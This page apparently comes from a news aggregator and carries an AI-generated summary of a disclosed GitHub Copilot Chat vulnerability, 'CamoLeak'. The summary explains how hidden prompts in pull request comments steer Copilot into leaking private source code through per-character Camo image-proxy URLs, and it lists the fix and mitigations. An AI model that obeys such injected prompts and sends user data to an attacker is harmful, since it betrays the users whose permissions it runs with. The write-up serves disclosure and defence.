CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private Source Code (www.legitsecurity.com)

🤖 AI Summary
In June 2025 a security researcher disclosed "CamoLeak," a critical CVSS 9.6 vulnerability in GitHub Copilot Chat that let an attacker silently exfiltrate private source code and secrets and fully control Copilot’s responses (including pushing malicious code or links). The exploit chained a remote prompt‑injection vector—embedding hidden prompts in pull request comments—with a novel bypass of GitHub’s Content Security Policy by abusing GitHub’s own image proxy (camo.githubusercontent.com). The researcher reported it via HackerOne; GitHub remediated the issue by disabling image rendering in Copilot Chat (fix rolled out by Aug 14). Technically, the attacker precomputed signed Camo URLs for every letter/symbol, embedded that dictionary in an injected prompt, then coerced Copilot to render arbitrary repo content as a grid of 1x1 camo‑proxied images (with cache‑busting random params). Because Copilot runs with the requesting user’s permissions, it could read private repo files, encode them (base16), and leak them when GitHub’s Camo fetched the images from the attacker’s server. The flaw highlights a broader risk: context‑aware assistants expand attack surface via stored/hidden UI content and trusted infrastructure. Mitigations include stricter handling of hidden comments, limiting rendered content from user-supplied markdown, better CSP/enclave isolation for assistant UI, and treating AI assistant inputs as untrusted when they can influence networked resources.
Loading comments...
loading comments...